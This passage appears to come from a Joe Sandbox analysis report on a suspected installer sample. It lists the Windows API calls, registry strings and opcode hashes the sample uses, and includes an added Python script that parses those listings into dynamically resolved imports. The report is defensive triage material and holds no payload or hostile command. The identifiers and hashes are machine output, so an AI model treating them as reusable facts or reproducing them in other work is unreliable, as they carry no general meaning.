• Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressChangeExchangeFilterHandleInterlockedMessageModuleProcWindow
                                                                                      • String ID: ChangeWindowMessageFilter$user32.dll
                                                                                      • API String ID: 1365377179-2498399450
                                                                                      • Opcode ID: fa00e12cc4cdf4861ecf6d36c6a3bf7660c016f9e535c548e0154396b519efb6
                                                                                      • Instruction ID: 0b0503ffc39751afc322a6ee3a4e58809baba8ea613a81ff3af562a8b1a90306
                                                                                      • Opcode Fuzzy Hash: fa00e12cc4cdf4861ecf6d36c6a3bf7660c016f9e535c548e0154396b519efb6
                                                                                      • Instruction Fuzzy Hash: 7FE0ECA1741310EAEA207BA27D8AF5A39949764715F51403BF104651E2C6BD0C40C91C
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,?,00493242), ref: 0047408E
                                                                                      • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 0047409B
                                                                                      • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 004740AB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$HandleModule
                                                                                      • String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                                                      • API String ID: 667068680-222143506
                                                                                      • Opcode ID: 5eed5f223692949adde618fed31680a65b1dac78b626770854a6ad78c0fe1b78
                                                                                      • Instruction ID: 0d19a0d9c31f114b981f83037a23f21ddb5836e87f543a540fedd059151603c0
                                                                                      • Opcode Fuzzy Hash: 5eed5f223692949adde618fed31680a65b1dac78b626770854a6ad78c0fe1b78
                                                                                      • Instruction Fuzzy Hash: B0C0C9E1285780EDAA00A7B11CC29B72548C590B29720813B7148792D2D67C0808CF2C
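The three listings above (oleacc, user32 and kernel32) all resolve APIs at run time through GetModuleHandle/GetProcAddress, which is what the "Contains functionality to dynamically determine API calls" signature is keyed on. When triaging such a report it is useful to have the resolved symbols as a list that can be diffed against the static import table. The parser below is an added example written for this page; it is not Joe Sandbox code and not part of the sample. It assumes only the line layout visible in these listings (`• Api.MODULE(args), ref: ADDR`, the `Part of subcall function` prefix, and the `APIs` header that opens each function's listing). SAMPLE is constructed from lines copied from this section; the function and class names are chosen for this example.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample: API lines copied from the function listings of this report.
# "APIs" is the header Joe Sandbox prints at the start of each function's listing.
SAMPLE = """\
APIs
• GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C240
APIs
• GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0049036E,QueryCancelAutoPlay,0049324C), ref: 0042E76A
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E770
• InterlockedExchange.KERNEL32(00496660,00000001), ref: 0042E781
• ChangeWindowMessageFilter.USER32(0000C199,00000001), ref: 0042E792
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,?,00493242), ref: 0047408E
• GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 0047409B
• GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 004740AB
APIs
• GetFocus.USER32 ref: 0041B6B5
• 73A0A570.USER32(?), ref: 0041B6C1
• 73A08830.GDI32(00000000,?,00000000,00000000,0041B78C,?,?), ref: 0041B6F6
APIs
  • Part of subcall function 0041A650: CreateBrushIndirect.GDI32 ref: 0041A6BB
• UnrealizeObject.GDI32(00000000), ref: 0041B1EC
"""

# One call record: optional subcall prefix, Api.MODULE, optional (args), "ref: ADDR".
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
HEX32_RE = re.compile(r"^[0-9A-F]{8}$")


@dataclass
class Call:
    block: int              # index of the "APIs" listing (one per analysed function)
    api: str                # API name, or a bare address when the plugin could not name it
    module: str             # module as printed by the plugin, e.g. KERNEL32
    args: list              # raw argument strings as logged ("?" = unknown)
    ref: str                # call-site address inside the sample
    subcall: Optional[str]  # callee address when the line is "Part of subcall function"


def parse_calls(text: str) -> list:
    """Parse the bullet lines of one or more 'APIs' listings into Call records."""
    calls, block = [], -1
    for line in text.splitlines():
        if line.strip() == "APIs":
            block += 1            # new function listing: start a new block
            continue
        m = LINE_RE.match(line)
        if not m:
            continue              # Strings/Similarity/memory-dump lines are not call records
        raw = m.group("args")
        args = [a for a in raw.split(",") if a] if raw is not None else []
        calls.append(Call(block, m.group("api"), m.group("mod"), args, m.group("ref"), m.group("sub")))
    return calls


def _looks_like_symbol(arg: str) -> bool:
    # An exported name is an identifier; "?", DLL names and 8-digit hex values are not.
    return bool(re.fullmatch(r"[A-Za-z_]\w*", arg)) and not HEX32_RE.match(arg)


def dynamic_imports(calls: list) -> list:
    """(module, symbol, call-site) for every GetProcAddress, taking the module from
    the nearest earlier GetModuleHandle*/LoadLibrary* in the same block.  The logged
    symbol argument is reported as None when it is not a plausible export name,
    because the sandbox prints whatever is on the stack at the call site."""
    result, module, cur_block = [], None, None
    for c in calls:
        if c.block != cur_block:
            module, cur_block = None, c.block   # never carry module state across functions
        if c.api.startswith(("GetModuleHandle", "LoadLibrary")) and c.args:
            if c.args[0].lower().endswith(".dll"):
                module = c.args[0].lower()
        elif c.api == "GetProcAddress":
            sym = c.args[1] if len(c.args) > 1 and _looks_like_symbol(c.args[1]) else None
            result.append((module, sym, c.ref))
    return result


def unnamed_callees(calls: list) -> list:
    """Distinct (module, address) pairs for calls the IDA plugin could only print as an
    address (e.g. 73A0A570.USER32); these need resolving against the DLL load base."""
    return sorted({(c.module, c.api) for c in calls if HEX32_RE.match(c.api)})


if __name__ == "__main__":
    parsed = parse_calls(SAMPLE)
    for entry in dynamic_imports(parsed):
        print("GetProcAddress:", entry)
    for entry in unnamed_callees(parsed):
        print("unnamed callee:", entry)
```

Two caveats are built in. The sandbox prints whatever is on the stack at the call site, so the second GetProcAddress argument can be stale: in the user32 listing it reads `user32.dll`, while the function actually resolved is evident from the next call, ChangeWindowMessageFilter(0000C199, 00000001), i.e. MSGFLT_ADD for a message ID in the RegisterWindowMessage range (the QueryCancelAutoPlay string in the same argument dump is the registered message name). The parser reports such a case as an unknown symbol rather than guessing. Second, entries such as 73A0A570.USER32 are callees the IDA plugin could only print as an address; unnamed_callees() lists them so they can be resolved against the DLL load bases before the GDI32/USER32 listings further down are read.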
                                                                                      APIs
                                                                                      • GetFocus.USER32 ref: 0041B6B5
                                                                                      • 73A0A570.USER32(?), ref: 0041B6C1
                                                                                      • 73A08830.GDI32(00000000,?,00000000,00000000,0041B78C,?,?), ref: 0041B6F6
                                                                                      • 73A022A0.GDI32(00000000,00000000,?,00000000,00000000,0041B78C,?,?), ref: 0041B702
                                                                                      • 73A16310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041B76A,?,00000000,0041B78C,?,?), ref: 0041B730
                                                                                      • 73A08830.GDI32(00000000,00000000,00000000,0041B771,?,?,00000000,00000000,0041B76A,?,00000000,0041B78C,?,?), ref: 0041B764
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: A08830$A022A16310A570Focus
                                                                                      • String ID:
                                                                                      • API String ID: 3731147114-0
                                                                                      • Opcode ID: 07ef95a0fb610648cfd8636f7bb4d0994a53704ba577931f4d82accc70482d19
                                                                                      • Instruction ID: 06dd750ffd38faa4806619bbf82afcbb6c92213719a6bc319da55d16d67b79f4
                                                                                      • Opcode Fuzzy Hash: 07ef95a0fb610648cfd8636f7bb4d0994a53704ba577931f4d82accc70482d19
                                                                                      • Instruction Fuzzy Hash: 8E512C70A00609AFDF11DFA9C895AEEBBB8FF49704F104466F510A7390D7789981CBA9
                                                                                      APIs
                                                                                      • GetFocus.USER32 ref: 0041B987
                                                                                      • 73A0A570.USER32(?), ref: 0041B993
                                                                                      • 73A08830.GDI32(00000000,?,00000000,00000000,0041BA59,?,?), ref: 0041B9CD
                                                                                      • 73A022A0.GDI32(00000000,00000000,?,00000000,00000000,0041BA59,?,?), ref: 0041B9D9
                                                                                      • 73A16310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BA37,?,00000000,0041BA59,?,?), ref: 0041B9FD
                                                                                      • 73A08830.GDI32(00000000,00000000,00000000,0041BA3E,?,?,00000000,00000000,0041BA37,?,00000000,0041BA59,?,?), ref: 0041BA31
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: A08830$A022A16310A570Focus
                                                                                      • String ID:
                                                                                      • API String ID: 3731147114-0
                                                                                      • Opcode ID: 6e3cb66e1f03a8473b81b7a24d1d9b736a83310d04235b0cfb06a94d2ee0ce24
                                                                                      • Instruction ID: 49b1e422d63778e1935042bf56866254f806bc58ba08b8974fd4ee1451f7b7cb
                                                                                      • Opcode Fuzzy Hash: 6e3cb66e1f03a8473b81b7a24d1d9b736a83310d04235b0cfb06a94d2ee0ce24
                                                                                      • Instruction Fuzzy Hash: 4F512B74A006089FCB11DFA9C895AAEBBF9FF48700F118066F904EB750D7389D40CBA8
                                                                                      APIs
                                                                                      • GetFocus.USER32 ref: 0041B4EE
                                                                                      • 73A0A570.USER32(?,00000000,0041B5C8,?,?,?,?), ref: 0041B4FA
                                                                                      • 73A14620.GDI32(?,00000068,00000000,0041B59C,?,?,00000000,0041B5C8,?,?,?,?), ref: 0041B516
                                                                                      • 73A3E680.GDI32(?,00000000,00000008,?,?,00000068,00000000,0041B59C,?,?,00000000,0041B5C8,?,?,?,?), ref: 0041B533
                                                                                      • 73A3E680.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0041B59C,?,?,00000000,0041B5C8), ref: 0041B54A
                                                                                      • 73A0A480.USER32(?,?,0041B5A3,?,?), ref: 0041B596
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: E680$A14620A480A570Focus
                                                                                      • String ID:
                                                                                      • API String ID: 932946509-0
                                                                                      • Opcode ID: dffe9a4686f16107f5e26edd6f51779d739af283e940a3615cd9a04b614b528f
                                                                                      • Instruction ID: a6e4b16520c9e4bc630ca31e265eea6a5194191570467489af8bdb357d288b52
                                                                                      • Opcode Fuzzy Hash: dffe9a4686f16107f5e26edd6f51779d739af283e940a3615cd9a04b614b528f
                                                                                      • Instruction Fuzzy Hash: 2D41C571A04254AFDF10DFA9C885AAFBBB5EF49704F1484AAE900E7351D2389D10CBA5
                                                                                      APIs
                                                                                      • SetLastError.KERNEL32(00000057,00000000,0045B7F4,?,?,?,?,00000000), ref: 0045B793
                                                                                      • SetLastError.KERNEL32(00000000,00000002,?,?,?,0045B860,?,00000000,0045B7F4,?,?,?,?,00000000), ref: 0045B7D2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast
                                                                                      • String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
                                                                                      • API String ID: 1452528299-1580325520
                                                                                      • Opcode ID: c7af221143c3757ba6277ed71e4eb1831b258c6f2836e0d3f8732b0bdbf4d2ee
                                                                                      • Instruction ID: e717c2d1a7dc230ecc2a2e6fa1343dbc2c1f959998bf22c76ea0b4b3804cf210
                                                                                      • Opcode Fuzzy Hash: c7af221143c3757ba6277ed71e4eb1831b258c6f2836e0d3f8732b0bdbf4d2ee
                                                                                      • Instruction Fuzzy Hash: 59117835204608AFDB11EAA2C941B6A76ADD788306F608077AD0456783D77C5F0A959D
                                                                                      APIs
                                                                                      • GetSystemMetrics.USER32(0000000B), ref: 0041BD45
                                                                                      • GetSystemMetrics.USER32(0000000C), ref: 0041BD4F
                                                                                      • 73A0A570.USER32(00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BD59
                                                                                      • 73A14620.GDI32(00000000,0000000E,00000000,0041BDCC,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BD80
                                                                                      • 73A14620.GDI32(00000000,0000000C,00000000,0000000E,00000000,0041BDCC,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BD8D
                                                                                      • 73A0A480.USER32(00000000,00000000,0041BDD3,0000000E,00000000,0041BDCC,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BDC6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: A14620MetricsSystem$A480A570
                                                                                      • String ID:
                                                                                      • API String ID: 1130675633-0
                                                                                      • Opcode ID: 1c903c0536bb10720712021bcda66a401c12054db1b22576e6386974878fa910
                                                                                      • Instruction ID: 8181195c8b7ace5e518c23098daf85fccaa127339f370ed271397b7e8efdaee2
                                                                                      • Opcode Fuzzy Hash: 1c903c0536bb10720712021bcda66a401c12054db1b22576e6386974878fa910
                                                                                      • Instruction Fuzzy Hash: 1F212C74E046499FEB04EFA9C941BEEB7B4EB48714F10402AF514B7680D7785940CFA9
                                                                                      APIs
                                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 0047927E
                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,00468BAA), ref: 004792A4
                                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 004792B4
                                                                                      • SetWindowLongA.USER32(?,000000EC,00000000), ref: 004792D5
                                                                                      • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 004792E9
                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 00479305
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Long$Show
                                                                                      • String ID:
                                                                                      • API String ID: 3609083571-0
                                                                                      • Opcode ID: 037c1e32dd2642cc50d0277f9f736c0c320296323ac053b412311dd49e28eafc
                                                                                      • Instruction ID: 4d45455b4d1dd4b2c508ae6452d3c78deeda3d3e7450a597efbdbc1d096824fd
                                                                                      • Opcode Fuzzy Hash: 037c1e32dd2642cc50d0277f9f736c0c320296323ac053b412311dd49e28eafc
                                                                                      • Instruction Fuzzy Hash: B9015EB5641310ABD700E768DD81F263B98AB1E330F0606AAB959DF3E7C639DC048B18
                                                                                      APIs
                                                                                        • Part of subcall function 0041A650: CreateBrushIndirect.GDI32 ref: 0041A6BB
                                                                                      • UnrealizeObject.GDI32(00000000), ref: 0041B1EC
                                                                                      • SelectObject.GDI32(?,00000000), ref: 0041B1FE
                                                                                      • SetBkColor.GDI32(?,00000000), ref: 0041B221
                                                                                      • SetBkMode.GDI32(?,00000002), ref: 0041B22C
                                                                                      • SetBkColor.GDI32(?,00000000), ref: 0041B247
                                                                                      • SetBkMode.GDI32(?,00000001), ref: 0041B252
                                                                                        • Part of subcall function 00419FC8: GetSysColor.USER32(?), ref: 00419FD2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                                      • String ID:
                                                                                      • API String ID: 3527656728-0
                                                                                      • Opcode ID: af92fd76f0ea33d52ebd072e8e43ea1c00ff5cbe0803c9f3aa53dd55169beb2c
                                                                                      • Instruction ID: 2be34f36c4bf399c8fa5e8a938e63ded300dcfd20fe04f8c9e05bbd916d2a40e
                                                                                      • Opcode Fuzzy Hash: af92fd76f0ea33d52ebd072e8e43ea1c00ff5cbe0803c9f3aa53dd55169beb2c
                                                                                      • Instruction Fuzzy Hash: 84F0BFB1511101ABCE00FFBAD9CAE4B27A89F443097048057B944DF19BC63CDC504B3E
                                                                                      APIs
                                                                                      • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 004724B6
                                                                                      • 73A159E0.USER32(00000000,000000FC,00472414,00000000,00472646,?,00000000,0047266B), ref: 004724DD
                                                                                      • GetACP.KERNEL32(00000000,00472646,?,00000000,0047266B), ref: 0047251A
                                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00472560
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: A159ClassInfoMessageSend
                                                                                      • String ID: COMBOBOX
                                                                                      • API String ID: 3375322265-1136563877
                                                                                      • Opcode ID: 2494eb77be1e0edaf4ac2089fb308deb96536dac66c833c5e7946f84bffa6ab9
                                                                                      • Instruction ID: cb5c9aae2de1f6f31ba47a78a2c89e9f0e2bb96aecd870e4ce07d9e094be5fb6
                                                                                      • Opcode Fuzzy Hash: 2494eb77be1e0edaf4ac2089fb308deb96536dac66c833c5e7946f84bffa6ab9
                                                                                      • Instruction Fuzzy Hash: F4514F74A04205AFC710DF65DA85EDAB7F5EB49304F1581BBF808AB3A2C778AD41CB58
                                                                                      APIs
                                                                                        • Part of subcall function 00424234: SetWindowTextA.USER32(?,00000000), ref: 0042424C
                                                                                      • ShowWindow.USER32(?,00000005,00000000,0049271D,?,?,00000000), ref: 004924EE
                                                                                        • Part of subcall function 0042D7A0: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D7B3
                                                                                        • Part of subcall function 00407210: SetCurrentDirectoryA.KERNEL32(00000000,?,00492516,00000000,004926E9,?,?,00000005,00000000,0049271D,?,?,00000000), ref: 0040721B
                                                                                        • Part of subcall function 0042D328: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D3B6,?,?,00000000,?,?,00492520,00000000,004926E9,?,?,00000005), ref: 0042D35D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                                                      • String ID: .dat$.msg$IMsg$Uninstall
                                                                                      • API String ID: 3312786188-1660910688
                                                                                      • Opcode ID: d8b767a4e34b569ce73df8f101cabac2d674949f6b0fce57bb6887b20208c213
                                                                                      • Instruction ID: 355638249edcb87860175999b9826d121cd81d9e81ad854bfd2fce74e3c3dc59
                                                                                      • Opcode Fuzzy Hash: d8b767a4e34b569ce73df8f101cabac2d674949f6b0fce57bb6887b20208c213
                                                                                      • Instruction Fuzzy Hash: 08317534A10204AFCB01FFA5DD5299E7FB5EB49304F91847AF400A7752CB78AD01CB98
                                                                                      APIs
                                                                                        • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,OG,?,00000001,?,?,0047E34F,?,00000001,00000000), ref: 0042DC70
                                                                                      • RegCloseKey.ADVAPI32(?,0048D7DE,?,?,00000001,00000000,00000000,0048D7F9), ref: 0048D7C7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseOpen
                                                                                      • String ID: PI$%s\%s_is1$Inno Setup CodeFile: $Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                      • API String ID: 47109696-2023862778
                                                                                      • Opcode ID: 631d1d32ed976d7a2296184d5c0d2f3cf8c369661ad41bfb37e5f76fcf4f9ba7
                                                                                      • Instruction ID: 2fcff84c3ae67162e3ffacf77063da78f15bdb16a6a8b48b49f63a94f6242022
                                                                                      • Opcode Fuzzy Hash: 631d1d32ed976d7a2296184d5c0d2f3cf8c369661ad41bfb37e5f76fcf4f9ba7
                                                                                      • Instruction Fuzzy Hash: 96314174E042089FDB11EFAADC51A9EBBF8EB48704F90487BE414E7391D7789A058B58
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042E802
                                                                                      • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E808
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042E831
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressByteCharHandleModuleMultiProcWide
                                                                                      • String ID: ShutdownBlockReasonCreate$user32.dll
                                                                                      • API String ID: 828529508-2866557904
                                                                                      • Opcode ID: a8508c04b9d2f5bfbb96bb821981feec28a03bb8c83af4d38bd3e4f3c08e389f
                                                                                      • Instruction ID: ad48e71c188330483611c0ccbf5126987ea3f08380f38d7ba2466a98a55f956a
                                                                                      • Opcode Fuzzy Hash: a8508c04b9d2f5bfbb96bb821981feec28a03bb8c83af4d38bd3e4f3c08e389f
                                                                                      • Instruction Fuzzy Hash: 35F0C2D138066176E620B2BBAC82F6B158C8F94765F540036F148EB2C2EA6CC905426E
                                                                                      APIs
                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00456298
                                                                                      • GetExitCodeProcess.KERNEL32(?,00492E02), ref: 004562B9
                                                                                      • CloseHandle.KERNEL32(?,004562EC,?,?,00456B07,00000000,00000000), ref: 004562DF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
